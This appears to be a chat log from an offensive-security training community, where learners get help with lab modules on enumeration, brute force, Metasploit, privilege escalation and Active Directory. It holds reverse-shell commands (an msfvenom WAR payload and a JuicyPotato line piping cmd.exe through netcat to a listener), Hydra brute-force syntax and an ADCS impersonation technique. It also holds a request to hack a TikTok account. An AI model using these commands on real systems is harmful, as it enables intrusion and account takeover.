You need to attack it from the inside
AD Trust attacks module, I still have not found a good solution to this. I tried tmux but the format was kinda bad. Anyone know of a way to allow the terminal to scroll after connecting to a windows host via proxychains ssh?
Also default port for ftp is 21
You can specify 127.0.0.1
Instead of the public ip
Since publicly 21 isn't open
how does that work and where do you get 127.... from
Loopback
Basic networking
Loopback is like calling a different hotel room from your own
The room in this case would be the port
how do i read the flag.txt file as an ftp>
I have to found FQDN of the host but there is no bind file what i should do ?
I mean test for pw reuse
Once you find a pw
Or in ftp if you see a file you want to read you can generally read with more
I would recommend going over the prerequisite modules to help you better understand the services. Intro to Networking, Linux Fundamentals, and Web Requests are prereqs for the Login Brute Force module.
Honestly basic networking goes far here
msfvenom, yes
The command cheat sheet includes one, and I believe you also did something similar in one of the sections
Ok. I think the default payload doesn't work not sure why
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
Seems the ticket
<@&861185840277487616> uhh
For the "Exploiting Web Vulnerabilities in Thick-Client Applications", do you just remove all hash values from the MANIFEST.mf or everything below the header and leave a space? I've followed the instructions for that first part, but the jar hangs after submitting creds no matter how i configure the manifest. Any help appreciated
Looks like I can communicate with the server:
module: Intro to C2 Operations with Sliver
Section: Probing the Surface
Question: Assess further the web application and submit the name of the database user
Description: I put in every user found in ||C:\Users|| but none of them is correct. Can anyone tell me how you guys found the user?
Connection to the target machine in the lab is very funky rn. I've tried 5 different VPN servers + 5 different target machine + 5 different pwnboxes (and personal VPN connection as well) but still get connection problems.
For example, if you ping the machine for a long time, you'll get 1500~2500ms spikes around every 20~30 ICMP requests. Sometimes, the spike is larger or the box becomes unresponsive. That's why your sliver connections are dropping, and that's why your cme connection sometimes fails, and sometimes succeeds.
Even with the timeouts, you'll occasionally see that your sliver beacons won't spawn SYSTEM beacons with getsystem, or just randomly die when you run the COFF loader commands listed in the labs.
Since I don't think it's intended, just decided to stop with the module.
The db user may not be a standard user then
¯\_(ツ)_/¯
At least that's my first thought if all users in C:\Users\ doesn't work
Could be a svc user
Like sql_svc or some such
thats what i thought at first, but nah XD
since this is Tier III hard level, i think they will expect me to perform certain skills that are not included in the section
since the question talks about database.... i might wanna do something with mysql or sqlmap
After removing the hash values from the MANIFEST.mf file and re-archiving my jar, I launch the jar and attempt to login to the server, but the application hangs. I see the client is connected to the service, but doesn't get a prompt
I suspect the extraction process might be clobbering the manifest.mf file, I see class files are split between two lines like below:
sorry to bother guys, just need some help with something. Does anyone know someone who can dox or hack a TikTok account? Not for malicious purposes, a friend of mine is being harassed
in the nibbles "privilege escalation" in getting started section in CPTS, i used "sudo monitor.sh", it asked for password but when i added the full path to sudo i.e "sudo /home/nibbler/personal/stuff/monitor.sh" it didn't ask for password!
so is there a difference between using sudo with relative path and absolute path?
perhaps; if you look at the overview it should tell you what modules it expects you to have done/know about
it's just that relative and absolute
when a user has sudo permissions over a binary path they have it specifically over the full absolute path
not the relative path
I see thanks 🫡
it's mostly because monitor.sh could be any program anywhere
even if you're in the right directory
but /home/nibbler/personal/stuff/monitor.sh is specifically that location
I didn't know that, sudo will look for files like that
yep
sudo checks explicitly about path
if you have (ALL):(ALL) then you are effectively root/admin user
Thanks for explaining
i believe something similar comes up in the knowledge check so keep an eye out 😉
Hhhh, 🫡
this is easily the most frustrating lab of all time
this manifest has to be preventing the jar from loading properly
lfg configured git repo for my notes
@pastel oak check for zone transfers to subdomains
you'd still dig @target_ip just instead of inlanefreight.htb you'd do subdomain.inlanefreight.htb
Does anyone know why I'm getting this error when attempting to use the -TrustedToAuth parameter with Get-NetUser?
PS C:\Users\bob\Downloads> Get-NetUser -TrustedToAuth
Get-NetUser : A parameter cannot be found that matches parameter name 'TrustedToAuth'.
At line:1 char:13
+ Get-NetUser -TrustedToAuth
+ ~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Get-NetUser], ParameterBindingException
+ FullyQualifiedErrorId : NamedParameterNotFound,Get-NetUser
Did you work this out? I'm having the same issue
quick question, is there any sliver command that speed up the beacon task ?
what module and section is this
Windows Attacks & Defense
Kerberos Constrained Delegation
what have you already done?
btw have you import powerview yet?
Imported PowerView.ps1, and then used the command. It doesn't work with the -TrustedToAuth parameter, but Get-NetUser works by itself
is the machine also slow on your end?
btw
run powershell as admin, use powershell -ep bypass, import powerview ,then run the command
No luck, here's my screenshot
turn on powershell as Administrator
ok trying now
Yeah, still same error
DM me, bud
Hi guys
I tried using dig and nc to find the fqdn that imap and pop3 are assigned to, but no results...anyone got any ideas?
I think ill do this too and wait till the connection gets better.
Im on the footprinting module
Yes, read the module, the answer is there.
Indeed, gubarz is right
okay thanks...i already did read the module but it seems a bit tricky
It's super not tricky and the answer is spelled out. I don't even think dig or netcat is mentioned on the page.
ok ill have another look
It’s not, I literally did this module 30 min ago
I'm on phone, so I wasn't going to try to search the page, but my notes and a quick glance said no.
im sorry could u give me a tip?
The command to run is on the page. Look at the footprinting bit. You won’t find the naming FQDN in the results. You gotta read the result
ah that makes more sense
thanks for that
Good luck 🤞
thanks man just solved it
Great job 👏
im not sure if my method was correct tho Ill explain
I used this command `openssl s_client -connect 10.129.197.72:pop3s`
and got this in the result
but the answer is after the @
and its a bit hard to know and identify the fqdn
Read a bit before that mail address. There’s the CN
is it possible that we can identify the fqdn from an email address?
ahh so CN is also fqdn?
That’s the Common Name aka FQDN
ahh thanks
You could have also used the first more common footprinting tool... 😉
u mean nmap?
yo guys I m on question 3 and need to enumerate through the imap server to retrieve the flag..I have logged in and also I have found that there is a mailbox called "flags"
when I try to list the mailbox content using 1 FETCH 1/FLAGS all it returns an error...anyone have any ideas?
See previous comment
u mean this?
Probably this
ahh ok 😂
yea just that ive tried following what it says but for some reason giving me error
* 1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
I managed to find this using the fetch all method
it says flag but the module wants it in a specific format
fetch all doesn't give the complete email body sometimes. You need to research a bit more on what can be done with FETCH command.
okay thanks
ive tried asking gpt for some clues but its not helping 😦
also tried this site
as u can see there is "flag"... is there a way I can cat it or something
thanks...still trying
Which section you working on
footprinting
Have you tried the FETCH command examples that are shown in here?
Hello, I have a problem about privilege escalation from ilfserveradmin to administrator on Lateral Movement section of Attacking Enterprise Networks lab, I followed each step on exploit-db, but it doesn't work.
did you solve it ?
yea and thank you I managed to solve it thanks to @rustic sage
it was actually when u connect...the inboxed dont have the flag @rustic sage saved me a lot of time cos what I was doing was futile
Yeah I did eventually. I think it worked exactly as the poc said it should, it was just finicky on the target. Like i tried 7 times with no luck and on the 8th it worked.
so funny, I hope in the exam, we don't have such case))
You probably will, thats just how software is sometimes.
Hi I am in windows escalation module and I need to use juicy potato what am I doing wrong here any pointers I missed?
The command I tried to use with clsid
.\jp.exe -l 53375 -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E} -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\lol\nc.exe 10.10.14.28 8443 -e cmd.exe" -t *
im having a hard time understanding what ports are. can someone explain like im 4
there's like TCP and UDP and Bluetooth and server stuff but aren't ports the cords that connect to your pc?
yea those are physical ports
the ones called TCP and UDP are logical ports they are built in the software of a system
there are a lot of services running in a system, if all of them are listening on the network how will your system understand which traffic is for which service. Now think of your ip address as an apartment complex and the ports are the apartment numbers within the complex. If a mail arrives with your apartment number the mail will come to your doorstep right
its the same with ports
Somehow, I can't connect to academy vpn yesterday until now
Both TCP and UDP and alternative server
once try changing to a different internet connection and connect again
ok
Don't overlook daddy dns
I don't have any dns now
I haven't used "juicy potato" and I can't spot what's wrong with the command, however what I can tell you is that you can use something else to escalate your privileges
My command needed some double quotes and then it worked like a charm
btw I would like to know about the other super secret technique
to escalate
other super secret technique is on Google, notice the user token privileges and have a look
ok thanks I will look into that
You can use HT if you want to, and yes it's there
oh you have to submit the external domain admin
make sure its in the section Domain Reconnaissance
I learned that these are subkeys of HKLM from windows fundamentals but they are referred to as hives here, what are they?
They are hives
Like SAM hive
Hi, I am doing DNS Tunneling with Dnscat2 section of "PIVOTING, TUNNELING, AND PORT FORWARDING". I have read the contents and I also managed to do the exercise. But I am not sure I understand what's happening. The DNS client has to be a DNS authoritative server? Can someone refer me something that will help me understand it?
I am also getting the error on powershell:
HTB lab is so slow. I used THM, then was disappointed about HTB
Agree, but content wise it is totally worth it
Sometimes it gets to the point of not being usable actually, i hope they change that soon
You can read the overview directly from the dev himself:
https://github.com/iagox86/dnscat2
sup everyone i'm kinda stuck in INJECTION ATTACKS-->Skills Assessment i have found the pdf generation vulnerability and i have found the xpath injection but i couldn't really use it, i'm not able to get anything useful from it
Any suggestions?
Dm
Do you still need help with that?
Try using one of the examples in the section it will produce a slightly different output
Don't overcomplicate it
No idea
I am one of the authors, yes
You can try combining the techniques taught in the intro to evasion module and you can combine it with whatever you can think of as long as it works in the end
That being said, you will have to focus on the stagers, rather than modifying the whole codebase related to implant generation
as it can become overwhelming
thanks check ur dms
This is exactly my experience! Can the admins confirm the lab isn't broken. I was able to assemble the jar and login without issue over the weekend following the process in the lab manual. But now I'm just spinning my wheels.
is it better to use UDP or TCP for my openvpn connection?
can anyone help me with the simple module 20 section 16 (Create the XOR ciphertext of the password 'opens3same' using the key 'academy'.)
I'm pretty sure that my solution is correct, but it won't accept the flag.
I'm on Getting Started -- Web Enumeration, and am trying to use the commands given in the notes to find the flag. However, when I use "sudo apt install seclists -y", I get this (attached image) as the output. Could someone please explain what the error message means, and how to resolve it?
The message output says everything. Probably it's not in the repo, are you using your own VM or the pwnbox?
You can also download it from the github repo:
https://github.com/danielmiessler/SecLists
Hello. I keep having problems when I try to install some tools on Parrot OS. I managed to install python2.7 thanks to some advice yesterday (I did it with docker). I also managed to install spiderfoot. But now I have 2 new errors. I did some research for crackmapexec, I even tried to see if it was possible to install it and its dependencies with docker or venv, but nothing worked. Did I do something wrong or do you have some advice to share please?
I'm using the pwnbox provided by htb, I'll try downloading from the repo 🤍
Btw thanks to the guys who've helped me yesterday. (sorry I don't remember the username), it was very helpful !
install this instead
https://www.netexec.wiki/getting-started/installation/installation-on-unix
it's the same as cme but updated
Okay thanks! I started to think crackmapexec was deprecated too
Friends, who works on mac OS here? can you write to the pm please? I have a problem with raising the python server in vpn
I reset the box, reassembled the jar and I was able to connect. That vm pool doesn't load consistently
Thank you! It worked, and I was able to find the flag. Very appreciative 🤍
I have exactly the same error as here https://forum.hackthebox.com/t/vpn-connection-problem/3467
But it didn't help me.
TCP
hii! i'm working on Getting Started --> Public Exploits. I understand the steps, and I got the flag, but I have a question about finding vulnerable applications. How would I know that openssh 7.2 was vulnerable? what cmd could i use to find all services on the ip address? i tried nmap -sC -sV, but it didn't show openssh 7.2, even though it was running on the server and was exploitable to achieve the flag
Nmap won't always show everything and openssh7.2 isn't the vulnerable thing on that section
it's not?? i could've sworn it was
There's a running web server yes?
"got flag" == thought i had the path to get it 😭
i think so
Why not visit it in a browser
:)
Note: this module is the basics
They wouldn't have you do anything complex or that requires any extra setup beyond just looking
Idk where you got the openssh path from lol
@quartz cradle are you ssh to the target?
@open summit you gotta get better at providing context man
mhm, that got me to a wordpress webpage
Skills assessment - website section
Read the page
If we're to reframe this question more generally as "How would I know that X software was vulnerable", the answer is to either search it up on google or research the software yourself (and perhaps find a zero-day)
If your question is more along the lines of "How would I be inspired to look it up in the first place", well that I think just takes practice. That's what enumeration's all about
What is the login form? Is it a /GET form?
Use the appropriate login type
it was in the notes, and i got the same output as the example when i ran searchsploit openssh 7.2
What notes?
My notes say nothing about openssh7.2 for this
searchsploit is just a CLI for exploit-db.com. It doesn't automatically spit out exploits for your target
maybe i'm overcomplicating it, then.. 😭
Read the webpage
the info that comes before the pwnbox
As this has to do simply with a vulnerable plugin
That's just an example
It just so happened to work, but that's not always going to be the case
Simple Backup Plugin 2.7.10 for WordPress?
note to self: clean my glasses 😭
alr 🤍
And it's likely far simpler than trying to do the ssh one
notes? 
Brother
You should be taking notes
This is why you tend to ask lots of questions
There's a whole section on the http forms
Get and put
And how to attack them
http[s]-{head|get|post}
Which do you think is most relevant here
https[s]-{get}
Without brackets and is this an https site
no it is not sir
so http-{get}?
Brackets aren't needed
so http-get
If you read the sections (and they even had relevant exercises) they explain the format
For future reference, CLI help text has a convention with that notation
[x] = it is optional to type x; {a|b|c} = choose one of a, b, c
So http[s]-{head|get|post} is a condensed way of saying you can choose one of the below:
http-head, http-get, http-post, https-head, https-get, https-post
Yes I just can’t seem to get down the right path…
running impacket-psexec gives share not writeable
evilwinrm give us powershell access
There's an example command that might be helpful
is this what the question is trying show?
hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -u -f 94.237.54.233 -s 46655 http-get /
this should work tho and it doesn't -
Try a different list maybe
for both usernames and pass?
Getting Started --> Public Exploits
I ran the exploit successfully, but didn't end up at meterpreter like the example shows. What am I supposed to do after executing the exploit against Simple Backup?
Oh I know your problem
run a session maybe?
Because that exploit isn't rce
Im listening boss
Read the description and look at the options
Read the first few lines of the default list
The default list is a username:password list
So it's meant to be used with a different hydra option, as explained by the module
@fathom pendant can you help on this
if you read the question it tells you what it wants ¯\_(ツ)_/¯
There's a reason it says to use other options
Wdym
What’s rce?
so like what do i do
Remote Code Execution
Fuckin read
If you wanna know hydra commands how would you check them
Brother it's a remote/arbitrary file download
It's not a shell
Not all exploits are shells
hydra -C
what file should i use tho
The one you were trying to use as your password 🤦
At some point you gotta apply critical thinking
I like your funny words, magic man
bros on his last straw 😭😂
I’m really new to this, so I need to go slower/simpler than you’re used to 🤍 i appreciate your help and patience
we all start somewhere
yuppp
Just one step at a time
Never make assumptions
And if you do, be prepared for them to be wrong
the sad part, is I passed my security+, and yet i struggle so much w/ htb 😭
Sec + ain't shit dog
it gave me an ego boost that htb absolutely tore to shreds 💀
sec+ doesnt really go hand to hand with htb lol
It's a multiple choice exam about memorization of basic stuff
I can't comment because I have no sec-related certs 💀
it really is
nah you’re good, i’m not trying to pull rank 😭
CompTIA certs are fancy toilet paper certs
humbling 💀
Mostly for gov stuff
but true, i didn’t really learn anything practical
if this were covid era it may still be cheaper than actual toilet paper tbh
But ultimately crumbles against practical certs
got a quick question on the last question on the DNS module on footprinting, in the end i managed to bruteforce it using dnsenum but im wondering how i would have spotted this manually just using dig queries? the only difference i've noticed was without spoiling it the subdomain that was "bruteforceable" contained a SOA & NS record on a normal dig query whilst others only contained A records - however it didn't let me do a zone transfer. maybe im not understanding correctly hmm
The point is to use the tool
But you may be onto something
Either way it's beyond the scope of the module
It's a lot of editing your hosts file afaik
yeah gotcha, so going forward for DNS footprinting best practice is to just dnsenum absolutely all subdomains i find through my initial dig query then?
mmm yeah i guess so, might spin up a bind9 server and mess around with it a bit more
Hey, so I am working on Linux Fundamentals. I'm currently trying to complete the task in 'System Information' but I believe there is some type of glitch. I load up the box and ssh into the student account. Once I use the "uname -a" command I begin to parse it into my answer boxes but they are saying most of my answers are wrong. In order to do the step-by-step, I need an annual membership. I can't afford that. lol.
but anyway i just wanted to clarify what i should be doing for future DNS enumeration
so find out the NS and then dig what i can and just dnsenum then
so after running the exploit, what should I look for / do? since it’s not a shell
@lucid halo bear with just spinning up the VM
i haven't done this module just yet but i'll try submitting answers
Thanks! I'm waiting...
generally you should read a bit on how the exploit works before you apply. If in msfconsole using info on the module will get you some insight
i didn’t know that was an option, thank you so much!
The question is looking for just the version number, make sure you don't have any white space around your answer.
you can also type help or ? to get a list of commands so you can help yourself 😉
there's a separate module that introduces you to metasploit and it's free (tier 0) so you can check that out later
There are multiple questions here, just realized that I can't send screenshots.
Well which question
socks is it the first question?
So the questions are asking about Network information, they aren't hard I'm just confused. I'll try to just power through it.
I ran info -d and received an output saying to generate documentation for something, then opening a .html file path in a browser (which, when i went to, said Not Found). I’m honestly really unsure where to go from here, I don’t understand what it wants me to do after running the exploit to get to the flag. Could you please explain in simpler wording where to go from here?
No, the first one was the easiest lol.
give me an example of a question that isn't accepting your answer
Which shell is specified for the htb-student user?
Hey, since I may never get to this modules or anything related to them
Can someone explain or introduce me what is deserialization?
@lucid halo worked for me
use the full path of the shell
there's an environment variable you can print to display it, copy that
@rustic sage its Linux and it won't accept my answer
it is not linux
Please explain
linux is the name of the OS
the question asked what shell, not what OS
right but even if I put ubuntu it won't work
shells are whats used to interface with the OS and accept commands
if you use info -d it should still tell you the filepath of the generated html that you can just open in your browser manually. But often info by itself should be enough.
It's also worth checking show options to make sure your module's configured right before you run
so for example when you run uname, you're not using linux directly you're using a shell that talks and can interpret to linux directly
Yes, I understand this part. But even if you look in the instructions before the assignment, they identify Linux as a shell.
I understand that Bash is a shell for instance or Debian
then there is your answer
Debian is a Linux distro and not a shell per se
how do I un-set something? I accidentally set my VHOST instead of my RHOST
shells are like bash, zsh ksh etc
unset VHOST
as cydroz said debian is an OS
there's an environment variable that stores the shell thats being used for that current users session, you can print this by using echo $SHELL in the terminal
A Linux terminal, also called a shell or command line
It does not say Linux is a shell, or that Ubuntu is a shell, but that the terminal is a shell, or command line
@rustic sage what answer did you give?
That fixed it! now i’ve arrived at a page that says WordPress Simple Backup File Read Vulnerability
google how to find current shell in linux
it gives examples for changing the RHOST though, which doesn’t seem like it would help me get to the flag
if you look slightly before that text i gave away exactly what the answer is
Thanks
RHOST = "remote host", aka your target, you need to set this to the machine IP.
Similar deal with RPORT
It's explained in the module briefly
nothing happens when i enter the credentials on the login form
of the target? so RPORT would be 51382 if my target is 94.237.52.13:51382
yes that's right
all good!
it ran without giving me any errors, which is good, my problem is that i don’t know where to go from here
when i do ls i get 3 files, none of which are wordpress or flag
you might have missed it but the question tells you where the flag is
OHHH
got it, i really need to pay attention to outputs. thank you immensely @fresh plinth
Hello again, I have a question. I'm on the Windows section of the Setting up module, and I was thinking. I don't want to bother installing a trial version of Windows on a VM since it is time limited, and I can't buy a product licence. Do you think I can use my host os, which is Windows 10 (I have already seen that it's not recommended, but I prefer to ask just in case), or can I skip the Windows setup for now? (I already managed to setup a vm of Parrot)
no prob, take it as a lesson to read carefully and make sure you've evaluated all the info available to you
Rather than grabbing the evaluation editions of windows you could just get an image of windows home/pro unlicensed to build a VM no?
And using bare metal is not recommended because you'd be connecting it direct to a hostile network basically
verify
also just to piggy back on this you can get an eval license and rearm it 5x times for 900 days eval
aaaa i’m literally right at the txt file, but neither cat nor type are allowing me to view the contents
Okay I will try to search for an unlicensed version. Thanks !
i did not know this and that's funny to me somehow
Oooh I was thinking that an unlicensed version of Windows would limit us
haha yeah so you get 180 days to evaluate the license but if you open a powershell window and do slmgr -dlv it rearms it for another 180 days
@wintry hull
you can do it 6 times maximum if i remember correctly
what cmd allows me to view the contexts of a txt file while in [msf]?
Take a wild stab, else use the help command
There are limitations but they're all irrelevant I think.
I didn't know this too, I will note that somewhere
Yeah I've seen it's more customization of the desktop etc. than anything else
Even then there are workarounds to those 😉
you can use cat as normal
Oooh I will try to look into that !
Did but still can't
Btw sorry for all the questions. I'm pretty new in Cybersecurity 
i tried that, and i get what looks like an /etc/password file
Review the options
me too, but we all start somewhere
There's a clear reason why it's /etc/passwd
what options?
For the exploit
straight-up show options?
Just options
Ideally I'll never have to apply this knowledge but I hope to remember this if that time comes lol
That should show you what you're looking for
i see FILEPATH is set to /etc/password, is that why?
If it looks like a duck
If you read it you'll know what to do, if you tried it and are having issues you should reach out to support.
there are (semi legit) ways to activate it, use your google skills
so options explains why it’s an /etc/password file, but not what to do with the file to get to the flag
How would you change a setting
working at an MSP you get to know lots of things like that
oh i’m stupid
I think I found those ways, but for now I will try with the unlicensed version. If I'm limited, I will try those ways
i am stealing that expression
i change /etc/password to /flag.txt?
Try it first, ask questions later
yessir
Thats an old expression
If it looks like a duck, and quacks like a duck, it's probably a duck
noooo it didn’t work
Aka sometimes it's that obvious
still an etc password file
How did you get the lhost setting changed
great, something to look forward to in the future perhaps lol
😉
the what now?
You s.. the variable
i set it to my target host
??
So same syntax
marcie you're such a tease
s.. is the command, missing two letters
set
I encourage critical thinking
what variable
If I just give the answer, nothing is learned
rhost is the target ip
Variable = option
So what variable would equate to the information you have
RHOST should just be the word option?? that doesn’t work
facepalm
/flag.txt ?
marcie im stuck on this question still like ive tried
not the sharpest nail, i’m sorry 😭
Take it slow
/flag.txt, no?
Yes, but what do you need to change to get there
used this format and it found passwords but then they dont work when i type them in the form
filepath
So...
i set filepath to /flag.txt
this is torture
Are you asking or telling
i can't bear to watch
i still end up with etc password
you got this aml
Then you did it wrong
gotta do it for the bag
Or you're missing the part where it's saved to a different file
And you're likely reading the same file expecting different results
i should change my display name 💀
it's getting too late for me but i wanna see aml bag this flag lol
That should work
Likely mistyped
The second one can be tricky if you don't set the parameters right
go to sleep, i don’t think this is getting figured out anytime soon 😭
which section you doing
aml just out of interest which exploit are you using
Just pay attention
OH MY GOD
To the output
omg
It's that shrimple
I GOT IT
has it clicked
kaching
FINALLY
lets go
It only gets harder from here 😄
lesson learned: tell someone to go to bed and you'll be enlightened
that was by far the most satisfying this ev— NOOOOO HUSH MARCIE
I mean as long as you actually read the material and take notes you're fine
Why? You have a valid username already
do I?
The one that got you past the first question
but then thats a different form tho
like why would the user be the same but passy different
@vagrant osprey which exploit/module was this?
Security
¯\_(ツ)_/¯
fair true cuz in order to get
Getting Started —> Public Exploits
ye true should be the same user
Also your user and pass input are incorrect
why
Take a look at how the form expects them to be passed
Either through a tool like burp or through browser network tool to inspect the request
Always be aware of what the form looks like
Again re-read the section about http-post if you need more clarity
^USER^ and ^PASSWORD^ will be the same as those are where hydra will inject the user and pass respectively
thank you so much all of you who helped me, i truly appreciate it
who, me? it’s 11am 💀
ah so instead of username and password it will be user and pass
Try and find out
Also be sure your fail string is correct
And the login point is correct
Is the page you're on "login.php"?
Is the html correct
hello guys , Is there a module where I can learn ADCS attacks?
Probably
Too easy to give the answer lmao
It's even funnier that it's titled "ADCS attacks"
EXACTLY !!!!!
Didn't even attempt looking it up on academy
My cube is not enough for that module :((
Even using the half-baked search feature
Well. That wasn't your question
if you're planning to do CPTS, ADCS is out of scope
you can get discount if you are student
It would likely cause you to overthink more than it would help
It's tier 3, it's not covered by student sub
yea
oh yaaa
¯\_(ツ)_/¯
@fathom pendant got a date for when you're doing the CPTS? i expect you to get all the flags in 24h based off how helpful you are instantly 
Why do you need/want to learn ADCS?
When I can, currently plate full
omg wanna read my blog post on ESC1 ADCS?
its my only blog post
I'm in the final stages of my job interview and there will be questions about this topic.
Then google
Im very lost in the osTicket portion of the Attacking Common Apps module, can somebody point me in the correct direction
Even be willing to admit, I don't know off the top of my head
@cedar yew ADCS are very common in the wild because microsoft documentation recommends templates to allow "allow requesters to include SAN in template" for autopilot builds
which allows anyone to specify a domain user to impersonate and receive a .pfx that can be used to authenticate against kerberos
i managed to get domain admin at my work bypassing windows defender + darktrace using that trick
you never know who might be in this group, fully agree with @fathom pendant being honest about your level of knowledge is the right thing.
not to mention, those who ask, probably know the answer, and have a highly honed bs meter
Depending on the level of job you applied for, they may just be looking to weed out people who bsed their resume
marcie will i be told off if i link my blog post
Yes sentenced to 12 years in the dungeon
adcs
There's a #community-content channel if it's not relevant to academy
check out certified preowned either way.
@cedar yew i linked my blog in #community-content not forcing you but i feel like its a cool read 😄
all feedback welcomed
it is my first blog after all
thank you
tried this for second part cant seem to find the password
hello, can I check if there's any support team that can help?
The support button in the website keep spamming me with Swag stuff and not going away
Email them
The support team does not monitor the discord
marcie u mentioned something about fail string
Thank you for the info
Yes, and the fail string is explained in the http-post section
Also is your endpoint correct
ye thats correct i got the right one
Is the page you're trying to bruteforce, login.php
ye i just seen now
its admin_login.php
so would forname='log-in'
I think their support site also down
¯\_(ツ)_/¯
Also delete because spoilers
But again did you try it or are you asking me if that's correct
i tried it
Then be patient
its gonna take forever i cant do the rocky.txt
Yes you can lol
Estimated time is how long it would take to go through the whole list
Not to get you the desired answer
(You can also use more threads)
what should i do t what
It shouldn't take too long either
Well commonly these types of services can handle 48-64 threads
i did -t 48
Also: keep in mind the page you see when you log in; this is important for the following skill assessment
Just. Be. Patient
Also make sure it's ^PASS^
¯\_(ツ)_/¯
Slight spelling errors can be the death of you
thx marcie boss
I don't know what part of the module you are in but there was also a technique that was talked about to generate custom wordlists for websites so maybe ur meant to use that here
Nah
That's the next skill assessment
Spoiler 😠
This first one is meant to use a generic wordlist
I mean if he read and followed the module; it's obvious
And took notes
¯\_(ツ)_/¯
I mean yeah I would do that but idk I feel like it spoiled it a bit for me
Also kinda basically what the first question tells you to do
"Using information from the previous assessment..."
"As you now have the name of an employee from the previous skills assessment question..."
Yep you know the name and it even tells you to use usernameGenerator to generate usernames
There's another tool used, and they even talk about using sed to cut things from wordlists
ye thats the password policy
Again, all things taught to you by the module
yes boss
Getting Started —> Privilege Escalation
I got the first flag, and am now onto the second, where I need to escalate from user2 to root. I ran dpkg -l and saw adduser version 3.118ubuntu2 was an option, so i looked up exploits for it and could not find any. None of the other packages seem fitting for privilege escalation, so where should I go from here?
Overcomplicating
ls -la /root/ and see if something stands out
Hint: file permissions
Privesc isn't always about software vulnerabilities
chloe
probably just typing their password into the wrong window
Skill issue
Try harder?!
chmod
Ah
it autocorrected and the edit didn’t go through 😭😭
But chmod isn't until after you figure out the interesting file and copy it over
oh
Sometimes they're hidden in plain sight
Any file or directory prefixed with . Is hidden
ls -alh then
The h isn't necessary
Also.
nothing really stands out to me
i got into .ssh/ if that’s what you meant
authorized keys, id rsa, and id rsa .pub
File permissions >> owner|group|others
Since you're not root, or in the root group, you'd be classified as "others
Perhaps you can read something
The id_rsa file is powerful
It acts as an authentication file
And when you consider it's owner, I'd say it's very useful
it’s a private key
root
So...
is there a way to use a file as a password?
what is the -i for
i have to unminimize to get to the man pages
can’t
tried ssh -i id_rsa and was prompted for user2’s password
Well
whose id_rsa is that
root
Copy the id_rsa to your system
And ssh from your system
The whole file is the id
wdym by ssh from my system
How did you first ssh in
ssh user1@94.237.62.124 -p 54910
Wdym "just sitting there"
o h
You gotta find a way to get the rsa file on your machine
you can also ssh locally without exiting your current ssh session iirc
Also there's a full-screen button for the pwnbox
Module: Broken Authentication
Section: Default Credentials
I am having an issue with the question I found the default credentials on the vendors website but it will not accept the answer. I put in other default credentials too. Can someone point in the right direction?
Try looking up a default wordlist the answer does have to do with the vendor
But not all info on the page/title is 100% needed
ok
is there anyone to have solution to this problem?
I have looked at three different source of that vendor default wordlist all them say come up with one pair of credentials
jerryrigged it
copied it, went back to my vm, pasted it into a new file
i’m a genius
mm it doesn’t like how much access the file has, now is chmod time
AYYYY GOT IT
That's literally the intended method
And now my Windows 10 VM is laggy. 100% disk usage on the task manager of the vm. After some search, it seems that it's because my vm is on an hdd or maybe I didn't allocate enough resources (I've allocated 4go of RAM and 2 CPU Core), it seems the Antivirus of the host can reduce the performance of the vm so I excluded the folder which contains the vm
Likely because hdd
Welp. I think I will use Parrot until I can have a SSD
4gb ram on windows is tuff
wow I didn't try one set lol
cant rdp connect through xfreerdp
but works through remmina
/cert-ignore also didnt help
ohh, got it
Any special characters you should generally be wary of
Best to wrap the string in single quotes and call it a day
Yup I think I will stay on Parrot. I don't know how but the disk usage of the Windows VM stabilized, but the update etc take too much space. And I think I will prefer a Linux os to do pentesting
Yeah Windows is space hungry
Woo got obsidian with git plugin working on my chromebook
Had to install gnome-keyring for it to store the secrets 
Some bullshit
this isn't really the place to discuss that, you should probably just delete your message
why is this not automatically filtered?
<@&861185840277487616>
I'm really sorry.
I still have a question. Is WSL has the same advantage for ethical hacking than VM ?
Just use a VM. Many people run into tons of random little issues with WSL.
Yeah I just found that. Thanks !
yeah no need to share that kinda story in modules tho
hi. still working on the end of module exercise on the shells module
i'm trying to exploit the tomcat server
using a java reverse shell payload
am i on the right track?
Sorry for keeping asking question. I'm still bothered because of the Windows VM problem and the module which give the impression that it's obligatory to have a Windows VM. I tried some research of course but I can't find an answer for the question. Is it obligatory to have a Windows VM for testing exploit ? Google only talk about main OS for ethical hacking
not needed for HTB. HTB Academy provides vm's you can exploit. The only reason you'd setup a Windows VM is for your own home lab and testing.
Hi so in the Password Attacks module in the Pass the Hash section the last question is as follows
Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish.
Can anybody explain to me why the results are like this? for psexec
and evil-winrm works
Okay so I think I will just use Parrot for HTB, and if I'm not mistaken, since I probably need Windows VM for future jobs, I will try to buy a SSD disk for it
You don't need a separate disk for a virtual machine, you just need free space
I don't have enough space for the 104 go of update. I will retry making space but I don't think I can.
Looks like PSExec attempts to write to a share in order to gain a shell, and it's being denied write privileges. evil-winrm uses windows remote management to connect.
Yeah but I wonder how does WinRM gain access then
via windows remote management.
Yeah I mean like how does windows remote management establish a remote shell but thats something for me to google and figure out probably
WinRM is a protocol dedicated to simply just that, remote management. it lets you execute commands, scripts, retrieve data, etc over a network
I'm just interested in knowing how the protocol works like does it just send commands through XML or idk \
For Password Attacks > Credential Hunting in Linux : is it possible, within a reasonable time, to find the user and the password without looking at the hint? how long did it take you?
After gaining the initial foothold then its pretty straight forward to get the hash you need to but getting into the system is the tricky part
feeling a bit stupid. stuck on the end of module exercise. Module shells
trying to exploit the first machine that is running a tomcat server
So far I have tried to upload a webshell. I have also explored the SMB service. successfully created an SMB session
Tricky is not the exact word to define the task, it's more like a pain in the a*s.
What type of shell did you upload
Yeah, it's out of place imo
